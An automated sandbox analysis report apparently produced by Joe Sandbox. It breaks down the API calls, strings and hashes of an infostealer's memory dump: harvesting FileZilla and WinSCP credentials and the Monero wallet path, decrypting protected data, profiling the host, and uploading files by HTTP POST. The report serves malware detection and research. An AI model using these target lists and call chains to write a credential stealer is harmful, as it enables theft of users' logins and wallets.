                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00410791
                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00410794
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1817501562-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0290d031e2a3dbc784d0dff4a7f08d204b59bf745b9abe95a94d8c41dc83014d
                                                                                                                                                                                                                                                                  • Instruction ID: 9bc869d4a87f0a99df79a9dd4561241c96e52cc0e637bffe87c645f5d44d53b9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0290d031e2a3dbc784d0dff4a7f08d204b59bf745b9abe95a94d8c41dc83014d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3118E34A00208BFDB00DBA5DC48FDEBFB9EF89714F1480A9E5049B250DBB5A586CB64
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DB6
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,0040443E,?,?,?,?,?,?), ref: 00410DC3
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,0040443E,?,?,?,?,?,?), ref: 00410DCA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateBinaryCryptProcessString
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 869800140-0
                                                                                                                                                                                                                                                                  • Opcode ID: fd999e819934099ffb11a9de783e20fe4796dd89c6bd1e87886222eae30587c2
                                                                                                                                                                                                                                                                  • Instruction ID: ec109ba8dd0b0e36f513698a7a9e762a41f090890661f4f8981a11abce3ef42c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd999e819934099ffb11a9de783e20fe4796dd89c6bd1e87886222eae30587c2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C016975200209FFDF118FA1DC448EBBBAEFF4A360B104425F90193210D775AC90EBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040104D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3676486918-0
                                                                                                                                                                                                                                                                  • Opcode ID: 0d05674718316e095d30fb5048cb9e0605715a5f03c012fc02b2c76bf856e2be
                                                                                                                                                                                                                                                                  • Instruction ID: a535ca16ea02c757ebdc93c68dc539e26f6d5eb16a56349bbf7fb8c321cb2dfc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d05674718316e095d30fb5048cb9e0605715a5f03c012fc02b2c76bf856e2be
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3BF03079240248FFDB115F91DD0AF9E7B7AEB46B40F104025FB01A91A0DBB19A909B20
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCEA
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCF1
                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426644,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FD00
                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0040FD1E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 362916592-0
                                                                                                                                                                                                                                                                  • Opcode ID: 446455e5df110580dbde9c98f5101df497741838af6a82f60c9ac386fe9bd983
                                                                                                                                                                                                                                                                  • Instruction ID: 429dfdafe37f2ee45bf2bd2832675558048c125e369346c3a49fa21dab44cbe0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 446455e5df110580dbde9c98f5101df497741838af6a82f60c9ac386fe9bd983
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E09B75700224BBE72067A4AC0EF96365D9B03725F111261F615D61D0E674994886A5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040631B
                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?), ref: 00406333
                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00406351
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0041736F,004265B7), ref: 0040FC1E
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0041736F,004265B7), ref: 0040FC25
                                                                                                                                                                                                                                                                  • GetUserNameA.ADVAPI32(00000000,?), ref: 0040FC39
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoSystemwsprintf

Control-flow Graph (graph dump omitted; first node 29 spans 4043d6-4044d5)
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004043DB
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040444A
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D92: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DB6
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D92: GetProcessHeap.KERNEL32(00000000,?,?,0040443E,?,?,?,?,?,?), ref: 00410DC3
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D92: RtlAllocateHeap.NTDLL(00000000,?,0040443E,?,?,?,?,?,?), ref: 00410DCA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044CD
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044ED
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404612
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 0040464C
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404670
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A98,00000000,?,?,00000000), ref: 00404B80
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00404B92
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404BA4
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00404BAB
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00404BBD
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00404BD0
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00404BE7
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00404BF1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00404C02
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404C1B
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00404C28
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404C3D
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C4E
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C75
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CF7
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00404D0F
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00404D1A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00404D2A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$OpenRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                                  • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                  • API String ID: 1779273220-3618031631

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040BC41
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D07: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D38
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: _EH_prolog.MSVCRT ref: 004061E3
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406206
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040621D
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406239
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406253
                                                                                                                                                                                                                                                                    • Part of subcall function 004061DE: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406274
                                                                                                                                                                                                                                                                    • Part of subcall function 00410D53: LocalAlloc.KERNEL32(00000040,004131C1,000000C8,00000001,?,004131C0,00000000,00000000), ref: 00410D6C
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 0040BD1F
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00425C9B,00425C9A,00425C97,00425C96), ref: 0040BD73
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040BD7A
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BD8E
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BD99
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BDD1
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDDC
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BE1A
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BE25
                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BE63
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BE72
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040C06D
                                                                                                                                                                                                                                                                    • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: _EH_prolog.MSVCRT ref: 0041451E
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: CreateThread.KERNEL32(00000000,00000000,0041331B,?,00000000,00000000), ref: 004145C4
                                                                                                                                                                                                                                                                    • Part of subcall function 00414519: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004145CC
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C0C0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: H_prologlstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitmemsetstrtok_s
                                                                                                                                                                                                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040E804
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E82D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E861
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E875
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E884
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E892
                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E8A3
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0040E8CB
                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E8F3
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0040E93A
                                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E957
                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,00425C8F), ref: 0040E9E9
                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040EA3B
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: memset$Value$Open$EnumH_prolog
                                                                                                                                                                                                                                                                  • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 0040518F
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F9A1: lstrcpy.KERNEL32(00000000,plA), ref: 0040F9C7
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: _EH_prolog.MSVCRT ref: 00403A82
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AB4
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403ABD
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: ??_U@YAPAXI@Z.MSVCRT ref: 00403AC6
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AE0
                                                                                                                                                                                                                                                                    • Part of subcall function 00403A7D: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AF0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040523A
                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004053D9
                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00405410
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425B20,00000000), ref: 0040581F
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405830
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040583A
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405841
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405852
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405863
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405874
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040588D
                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405896
                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004058A9
                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004058BD
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,000000C7,?), ref: 00405911
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040591C
                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405435
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00405925
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 0040592E
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 00405251
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                                                                                                  • String ID: "$"$"$)$------$------$------$------$build_id$mode

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 004146EC
                                                                                                                                                                                                                                                                    • Part of subcall function 0040F96A: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F994
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: _EH_prolog.MSVCRT ref: 0040FAE8
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrlenA.KERNEL32(?,?,?,?,?,0041738F,?,?,00426B18,?,00000000,004265B7), ref: 0040FB10
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcpy.KERNEL32(00000000), ref: 0040FB37
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FAE3: lstrcat.KERNEL32(?,?), ref: 0040FB42
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000,?), ref: 0040FA61
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: _EH_prolog.MSVCRT ref: 0040FA74
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcpy.KERNEL32(00000000), ref: 0040FAC0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FA6F: lstrcat.KERNEL32(?,?), ref: 0040FACA
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042653E), ref: 0040FC8D
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FC94
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042653E), ref: 0040FCA0
                                                                                                                                                                                                                                                                    • Part of subcall function 0040FC7F: wsprintfA.USER32 ref: 0040FCCB
                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: memset.MSVCRT ref: 00410483
                                                                                                                                                                                                                                                                    • Part of subcall function 0041045D: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,>eB,?,?,00000000), ref: 0041049F
